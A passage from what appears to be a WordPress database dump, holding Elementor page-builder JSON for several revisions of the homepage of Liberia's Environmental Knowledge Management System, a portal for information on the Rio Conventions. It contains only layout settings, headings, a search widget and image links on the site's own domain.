"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5807,516,'_elementor_version','2.7.5'),(5808,516,'_elementor_template_type','wp-page'),(5811,517,'_wp_page_template','default'),(5812,517,'_elementor_edit_mode','builder'),(5813,517,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5814,517,'_elementor_version','2.7.5'),(5815,517,'_elementor_template_type','wp-page'),(5817,518,'_wp_page_template','default'),(5818,518,'_elementor_edit_mode','builder'),(5819,518,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions 